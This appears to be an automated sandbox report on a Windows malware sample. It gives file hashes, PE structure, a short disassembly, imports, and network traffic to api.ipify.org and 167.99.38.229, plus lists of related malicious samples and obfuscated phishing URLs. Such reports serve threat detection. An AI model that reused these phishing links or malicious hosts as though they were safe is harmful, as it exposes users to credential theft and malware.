              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.26.12.205xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
              • api.ipify.org/
              GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
              • api.ipify.org/
              8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
              • api.ipify.org/
              Simple2.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
              • api.ipify.org/
              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              6706e721f2c06.exeGet hashmaliciousRemcosBrowse
              • api.ipify.org/
              perfcc.elfGet hashmaliciousXmrigBrowse
              • api.ipify.org/
              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              172.67.74.152malware.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
              • api.ipify.org/
              Simple1.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              Simple2.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              systemConfigChecker.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              systemConfigChecker.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
              • api.ipify.org/
              Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
              • api.ipify.org/
              4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
              • api.ipify.org/
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              api.ipify.orgQUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
              • 172.67.74.152
              INVOICE NO. USF23-24072 IGR23110.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.13.205
              SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.13.205
              EEMsLiXoiTzoaDd.scrGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.67.74.152
              Statement 2024-11-29 (K07234).exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.12.205
              Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
              • 104.26.13.205
              1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
              • 104.26.12.205
              jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
              • 172.67.74.152
              enyi.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.26.13.205
              proforma invoice.exeGet hashmaliciousAgentTeslaBrowse
              • 104.26.13.205
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUSnicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
              • 104.21.84.67
              nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
              • 104.21.84.67
              invoice09850.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.6
              Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
              • 104.21.86.72
              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
              • 104.21.78.149
              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
              • 104.18.41.169
              https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1Get hashmaliciousHTMLPhisherBrowse
              • 104.18.95.41
              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
              • 172.64.41.3
              https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
              • 104.21.37.221
              https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
              • 172.67.213.233
              DIGITALOCEAN-ASNUShttps://hongkongliving.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
              • 159.89.194.120
              http://prntbl.concejomunicipaldechinu.gov.coGet hashmaliciousUnknownBrowse
              • 167.172.148.114
              Josho.arm.elfGet hashmaliciousUnknownBrowse
              • 157.230.180.175
              hax.arm.elfGet hashmaliciousMiraiBrowse
              • 45.55.195.236
              http://abercombie.comGet hashmaliciousUnknownBrowse
              • 104.248.224.96
              https://listafrica.org/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
              • 68.183.112.81
              https://t.ly/8cSDxGet hashmaliciousUnknownBrowse
              • 188.166.17.21
              Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • 165.22.38.185
              http://email.edms.trackingmore.com/c/eJx0zrFuhDAMgOGnCWPE2YHAkKELr4FsxwF05EBJWun69JU6den8D_8XQz88mKXT8PCICDi6udsDJB44oUuePHiZGCABe0UvMAlP3RGGSSHOI4w--d7NiUdBAlQPKglkNq7Pb9sKyfN4bfkqauXK3Rn21m6DHwYWA0usZKlGu50X03lT2-tOJ1mNn_Z1G1hK7PJ7zVorbboe8Y9z_T7kWS7W0tD1xvVbpuP8vZTwf_sK8BMAAP__3p9Nvw#4UjjVf19156dXgi477henjyiztuh1607QELNKWKBNFUHFFI32RLCJ32096s9/84502vqzGet hashmaliciousPhisherBrowse
              • 159.65.226.43
              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
              • 188.166.27.224
              CLOUDFLARENETUSnicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
              • 104.21.84.67
              nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
              • 104.21.84.67
              invoice09850.xlsGet hashmaliciousRemcosBrowse
              • 188.114.96.6
              Reqt 83291.vbsGet hashmaliciousRemcos, GuLoaderBrowse
              • 104.21.86.72
              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
              • 104.21.78.149
              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
              • 104.18.41.169
              https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1Get hashmaliciousHTMLPhisherBrowse
              • 104.18.95.41
              Nieuwebestellingen10122024.exeGet hashmaliciousFormBookBrowse
              • 172.64.41.3
              https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
              • 104.21.37.221
              https://smialex.id/FrbleuelsasGet hashmaliciousAnonymous ProxyBrowse
              • 172.67.213.233
              No context
              No context
              Process:C:\Users\user\Desktop\jgbC220X2U.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):336
              Entropy (8bit):3.7406015629507228
              Encrypted:false
              SSDEEP:6:UoLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLF3oLFy:NFmFmFmFmFmFmFmFmFmFmFmFmFmFy
              MD5:13D131A6EDC53FE2FDADC4EA0203A08A
              SHA1:30F818ED02C33FB137D0F8B419B6538BBAEEE14B
              SHA-256:92185235AF3FBCF3F0157EFBDAAA9834B3A27CA66A4A00B1552F15448C21BAA3
              SHA-512:CF5DA223E39E7F85CBF6CA5D6C0DE04B12B9B51AA01A2555BDBCC83F021CE489915040518D4E7C2648C2E1300EF8547F329FA8721A24FD1739DB0ED75DD8E99F
              Malicious:false
              Reputation:low
              Preview:Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...Failed to send status...
              File type:PE32+ executable (console) x86-64, for MS Windows
              Entropy (8bit):5.889389316114988
              TrID:
              • Win64 Executable Console (202006/5) 92.65%
              • Win64 Executable (generic) (12005/4) 5.51%
              • Generic Win/DOS Executable (2004/3) 0.92%
              • DOS Executable Generic (2002/1) 0.92%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:jgbC220X2U.exe
              File size:7'131'898 bytes
              MD5:28354f3e0d66d054bf0d05c3caf1e28a
              SHA1:612fa801d24607511387c8e051bd6de9e0d26b9e
              SHA256:f88fa3aa1dc3a59d1914254917c835783d84d384675f3622dde5aa7893952c96
              SHA512:a15e48bd8be9f74a98d6bb3cce4b2b55625629ea972fdd9a05179f5a6c6957b3bfa90883e6427cc66171fef49837912a58d230ac03c7aecd2b5c31775db2bb15
              SSDEEP:98304:pUkIJaHXWPAfyCdpj6tDW47zhOBJkb9aiieIaH8CRwd9uzhOY2o3QwBSHsg5t61F:ikIRR5h6HE1rL5LGfvt2
              TLSH:E576D9A715AB5CE5EAC673BCB5C7623D9B34FC22CD69192F9204C435AC832847D2EB41
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g....*.....&....*.h...|......%..........@.....................................Um...`... ............................
              Icon Hash:00928e8e8686b000
              Entrypoint:0x140001125
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x140000000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x670D7FE8 [Mon Oct 14 20:32:40 2024 UTC]
              TLS Callbacks:0x4000bfe0, 0x1, 0x4000c0a0, 0x1, 0x4001b54e, 0x1
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:ef8b3b70a03909079864c2140721ce14
              Instruction
              push ebp
              dec eax
              mov ebp, esp
              dec eax
              sub esp, 30h
              mov dword ptr [ebp-04h], 000000FFh
              dec eax
              mov eax, dword ptr [001545B5h]
              mov dword ptr [eax], 00000000h
              call 00007F412122A703h
              mov dword ptr [ebp-04h], eax
              nop
              nop
              mov eax, dword ptr [ebp-04h]
              dec eax
              add esp, 30h
              pop ebp
              ret
              push ebp
              dec eax
              mov ebp, esp
              dec eax
              sub esp, 70h
              dec eax
              mov dword ptr [ebp-10h], 00000000h
              mov dword ptr [ebp-1Ch], 00000030h
              mov eax, dword ptr [ebp-1Ch]
              dec eax
              mov eax, dword ptr [eax]
              dec eax
              mov dword ptr [ebp-28h], eax
              dec eax
              mov eax, dword ptr [ebp-28h]
              dec eax
              mov eax, dword ptr [eax+08h]
              dec eax
              mov dword ptr [ebp-18h], eax
              mov dword ptr [ebp-04h], 00000000h
              jmp 00007F412122A713h
              dec eax
              mov eax, dword ptr [ebp-10h]
              dec eax
              cmp eax, dword ptr [ebp-18h]
              jne 00007F412122A6FBh
              mov dword ptr [ebp-04h], 00000001h
              jmp 00007F412122A737h
              mov ecx, 000003E8h
              dec eax
              mov eax, dword ptr [001A8746h]
              call eax
              dec eax
              mov eax, dword ptr [0015459Dh]
              dec eax
              mov dword ptr [ebp-30h], eax
              dec eax
              mov eax, dword ptr [ebp-18h]
              dec eax
              mov dword ptr [ebp-38h], eax
              dec eax
              mov dword ptr [ebp-40h], 00000000h
              dec eax
              mov ecx, dword ptr [ebp-38h]
              dec eax
              mov eax, dword ptr [ebp-40h]
              dec eax
              mov edx, dword ptr [ebp-30h]
              dec eax
              cmpxchg dword ptr [edx], ecx
              dec eax
              mov dword ptr [ebp-10h], eax
              dec eax
              cmp dword ptr [ebp-10h], 00000000h
              jne 00007F412122A69Ah
              dec eax
              mov eax, dword ptr [00154576h]
              mov eax, dword ptr [eax]
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1a90000x1d50.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x16a0000x1a8d4.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1ad0000x1d68.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x153f200x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x1a97680x638.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x1467000x14680077349d5ce0842838be283c444b1e7fa0False0.31570037327718226data6.011577155215405IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x1480000x4ca00x4e001a246a5035db48224f189597fa5571eaFalse0.031600560897435896data0.5703995935155458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0x14d0000x1b2600x1b40061af7993cdd0dd079eb666aeac4897beFalse0.20101956708715596data5.289366783312055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              /40x1690000x40x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .pdata0x16a0000x1a8d40x1aa0032a19f1d5eaa9f8d6018332c3953aaa4False0.5223921654929577data6.170793177437251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .xdata0x1850000x2245c0x226008daf71ea83cefd59f84d26a67bd78028False0.17060369318181817shared library4.76992069970833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .bss0x1a80000xd800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x1a90000x1d500x1e0085c7fb81abf5152ee91f00c23d90fe4aFalse0.3067708333333333data4.470422394573293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .CRT0x1ab0000x680x200b9b680875ff1ac6dc2d841039d9c0882False0.076171875data0.37020935604047256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x1ac0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .reloc0x1ad0000x1d680x1e00f6f4e4b1783d86a4ba1b2e0d407ad73dFalse0.35208333333333336data5.429210425100174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /140x1af0000xd00x2004c5ccc9a8c7e1f50c9332e402fcdd6e6False0.154296875data0.8135941418709078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /290x1b00000x46f90x48008a70cdea438dd463d8d169b649d5cef3False0.3792860243055556Matlab v4 mat-file (little endian) @\001, rows 134283269, columns 0, imaginary5.830938126363056IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /410x1b50000x8a50xa008c412e1ec809bc2d22840ac0c0dd9436False0.326953125data4.517567710861818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /550x1b60000x97f0xa0093edfdff4dd5e8ebd761fe7a54efc881False0.540625data4.789641841730167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /670x1b70000x4980x60094009fe3acab9a4989e90d3e57374634False0.3444010416666667data3.151620531573487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /800x1b80000xce0x200292217cd9caa0647d900f44faf753dd5False0.34375data2.8722615854557496IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /910x1b90000x4610x60075a450f8317627827fe1cca60ebb0ae6False0.181640625data4.17072784657899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /1070x1ba0000x88b0xa00fd46d698c19f66b45ec30d6988f5b6d4False0.398828125data4.021570199541239IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              /1230x1bb0000x1080x20006fb2fd98c2a2dd2828869db38f7cb4eFalse0.294921875data2.3510720891965007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              DLLImport
              KERNEL32.dllAddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateFileMappingW, CreateFileW, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, FormatMessageA, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSizeEx, GetHandleInformation, GetLastError, GetModuleHandleA, GetProcAddress, GetProcessAffinityMask, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount64, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryA, LocalFree, MapViewOfFile, MultiByteToWideChar, OpenProcess, OutputDebugStringA, RaiseException, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnmapViewOfFile, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte
              api-ms-win-crt-convert-l1-1-0.dll_ultoa, mbrtowc, strtol, strtoll, strtoul, strtoull, wcrtomb
              api-ms-win-crt-environment-l1-1-0.dll__p__environ, __p__wenviron, getenv
              api-ms-win-crt-filesystem-l1-1-0.dll_fstat64, _stat64
              api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, calloc, free, malloc, realloc
              api-ms-win-crt-locale-l1-1-0.dll___lc_codepage_func, ___mb_cur_max_func, localeconv, setlocale
              api-ms-win-crt-math-l1-1-0.dll__setusermatherr, _fdopen
              api-ms-win-crt-private-l1-1-0.dll__C_specific_handler, __intrinsic_setjmpex, longjmp, memchr, memcmp, memcpy, memmove, strchr
              api-ms-win-crt-runtime-l1-1-0.dll__p___argc, __p___argv, __p___wargv, _assert, _beginthreadex, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _endthreadex, _errno, _exit, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_app_type, _set_invalid_parameter_handler, abort, exit, signal, strerror, system
              api-ms-win-crt-stdio-l1-1-0.dll__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfprintf, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vswprintf, _fileno, _fseeki64, _ftelli64, _lseeki64, _read, _wfopen, _write, fclose, fflush, fgetwc, fopen, fputc, fputs, fread, fwrite, getc, getwc, putc, putwc, setvbuf, ungetc, ungetwc
              api-ms-win-crt-string-l1-1-0.dll_strdup, iswctype, memset, strcmp, strcoll, strlen, strncmp, strxfrm, towlower, towupper, wcscoll, wcslen, wcsxfrm
              api-ms-win-crt-time-l1-1-0.dll__daylight, __timezone, __tzname, _tzset, strftime, wcsftime
              api-ms-win-crt-utility-l1-1-0.dllrand_s
              WS2_32.dllWSACleanup, WSAGetLastError, WSASocketW, WSAStartup, __WSAFDIsSet, closesocket, connect, freeaddrinfo, getaddrinfo, getnameinfo, getpeername, getsockname, getsockopt, ioctlsocket, ntohs, recv, select, send, setsockopt, shutdown, socket
              TimestampSource PortDest PortSource IPDest IP
              Dec 11, 2024 11:28:58.618937016 CET4970480192.168.2.5172.67.74.152
              Dec 11, 2024 11:28:58.742666960 CET8049704172.67.74.152192.168.2.5
              Dec 11, 2024 11:28:58.742782116 CET4970480192.168.2.5172.67.74.152
              Dec 11, 2024 11:28:58.776192904 CET4970480192.168.2.5172.67.74.152
              Dec 11, 2024 11:28:58.898510933 CET8049704172.67.74.152192.168.2.5
              Dec 11, 2024 11:28:59.841166019 CET8049704172.67.74.152192.168.2.5
              Dec 11, 2024 11:28:59.841892958 CET4970480192.168.2.5172.67.74.152
              Dec 11, 2024 11:28:59.841926098 CET8049704172.67.74.152192.168.2.5
              Dec 11, 2024 11:28:59.842000961 CET4970480192.168.2.5172.67.74.152
              Dec 11, 2024 11:28:59.964108944 CET8049704172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:00.476305008 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:00.599672079 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:00.599808931 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:00.612281084 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:00.735930920 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:00.735989094 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:00.860642910 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.844504118 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.844525099 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.844536066 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.844670057 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:01.844922066 CET4970580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:01.862426043 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:01.970168114 CET8049705167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.987384081 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:01.987464905 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:01.987719059 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:02.111521006 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:03.231303930 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:03.231328011 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:03.231349945 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:03.231373072 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:03.231414080 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:03.232486963 CET4970680192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:03.357249975 CET8049706167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:08.222858906 CET4970780192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:08.346604109 CET8049707172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:08.346791029 CET4970780192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:08.347069979 CET4970780192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:08.467957973 CET8049707172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:09.444174051 CET8049707172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:09.444520950 CET8049707172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:09.444525957 CET4970780192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:09.444575071 CET4970780192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:09.445609093 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:09.565968990 CET8049707172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:09.565984964 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:09.566185951 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:09.566456079 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:09.686184883 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:09.686248064 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:09.805650949 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.803586960 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.803620100 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.803632975 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.803716898 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:10.803757906 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:10.804024935 CET4970880192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:10.805242062 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:10.923233986 CET8049708167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.924577951 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:10.924681902 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:10.940543890 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:11.060894012 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:12.177777052 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:12.177824020 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:12.177912951 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:12.179074049 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:12.179132938 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:12.179236889 CET4970980192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:12.298531055 CET8049709167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:17.191245079 CET4971480192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:17.310621977 CET8049714172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:17.310827017 CET4971480192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:17.311166048 CET4971480192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:17.430489063 CET8049714172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:18.416271925 CET8049714172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:18.416594028 CET4971480192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:18.417280912 CET8049714172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:18.417356014 CET4971480192.168.2.5172.67.74.152
              Dec 11, 2024 11:29:18.417546034 CET4971580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:18.535995960 CET8049714172.67.74.152192.168.2.5
              Dec 11, 2024 11:29:18.536818027 CET8049715167.99.38.229192.168.2.5
              Dec 11, 2024 11:29:18.537636995 CET4971580192.168.2.5167.99.38.229
              Dec 11, 2024 11:29:18.538021088 CET4971580192.168.2.5167.99.38.229
